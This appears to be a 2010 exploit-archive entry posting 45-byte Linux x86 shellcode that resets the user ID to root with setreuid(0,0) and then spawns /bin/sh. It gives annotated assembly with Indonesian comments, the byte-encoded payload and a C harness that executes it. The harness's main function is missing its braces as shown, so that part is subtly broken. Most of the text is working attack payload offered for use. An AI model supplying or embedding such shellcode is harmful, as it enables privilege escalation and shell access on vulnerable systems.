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Execute /bin/sh With setreuid 0,0 Shellcode

Execute /bin/sh With setreuid 0,0 Shellcode
Posted Jun 18, 2010
Authored by gunslinger | Site gunslingerc0de.wordpress.com

45 bytes small sys_setreuid (0,0) - sys_execve("/bin/sh","","") shellcode.

tags | shellcode
SHA-256 | ac9e9d9b529104fbb0798b88d11a8ced3644df6e75a4cd5b49d2b004d456172e

Execute /bin/sh With setreuid 0,0 Shellcode

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Title : execute /bin/sh with setreuid 0,0
Name : 45 bytes sys_setreuid (0,0) - sys_execve("/bin/sh","","")
Date : Thu Jun 17 16:58:40 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz : jasakom.com , devilzc0de.org - com , xc0de.or.id, yogyacarderlink.web.id, serverisdown.org
tested on : linux debian
---------------------------Original assembly-----------------------------
global _start

xor eax, eax ; bersihkan register!
xor edx, edx ;
xor ebx, ebx ;
xor ecx, ecx ;

mov al, 70 ; sys_setreuid()
add bl,1 ; tambah 1 register bl menjadi 1 -> sys_setreuid(1,)
dec bl ; kurangi 1 register bl menjadi 0 -> sys_setreuid(0,)
mov cl,bl ; kopikan nilai register bl ke cl. nilai register cl menjadi 0 -> sys_setreuid(0,0)
int 0x80 ; interupsi kernel kerjakan !

jmp short end ; loncat tanpa kondisi ke end >-------------------------------------------------------------------.
; |
start: ; start terpanggil <--------------------------------------------------------------------------. |
mov al,11 ; syscall nomer 11 execve | | ;syscall sys_execve(args1,args2,args3)
pop ebx ; ambil dari stack <-------------------------------------------------------------------------------------------------------. ;sys_execve ("/bin/sh"
mov ecx, edx ; nilai register edx kosong, lalu kopikan ke register ecx jadi ecx kosong | | | ;sys_execve ("/bin/sh",0,0)
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
; | | |
xor eax, eax ; bersihkan register ecx | | | ;syscall exit()
inc eax ; increment eax, atau tambah eax 1 karena nilai eax 0 jadi eax menjadi 1 syscall nomer 1 exit | | | ;sys_exit()
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
; | | |
end: ; label start <-----------------------------------------------------------------------------------' |
call start ; panggil start >-----------------------------------------------------------------------------' |
db '/bin/sh' ; masukan string '/bin/sh' ke stack >--------------------------------------------------------------------------------------'

------------------------Eof Original assembly-----------------------------
#include <stdio.h>

char *shellcode=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x31\xdb" /* xor %ebx,%ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb0\x46" /* mov $0x46,%al */
"\x80\xc3\x01" /* add $0x1,%bl */
"\xfe\xcb" /* dec %bl */
"\x88\xd9" /* mov %bl,%cl */
"\xcd\x80" /* int $0x80 */
"\xeb\x0c" /* jmp 0x8048081 */
"\xb0\x0b" /* mov $0xb,%al */
"\x5b" /* pop %ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xef\xff\xff\xff" /* call 0x8048075 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 0x80480f5 */

int main(void)
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;

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